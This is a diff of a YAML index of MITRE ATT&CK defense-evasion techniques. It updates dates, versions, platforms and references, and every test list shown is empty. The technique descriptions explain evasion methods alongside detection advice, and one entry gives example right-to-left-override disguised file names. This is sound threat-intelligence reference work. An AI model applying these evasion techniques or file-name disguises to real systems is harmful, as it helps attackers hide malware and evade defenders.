         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1036.004:
@@ -7225,7 +7342,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests: []
   T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -7989,7 +8094,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
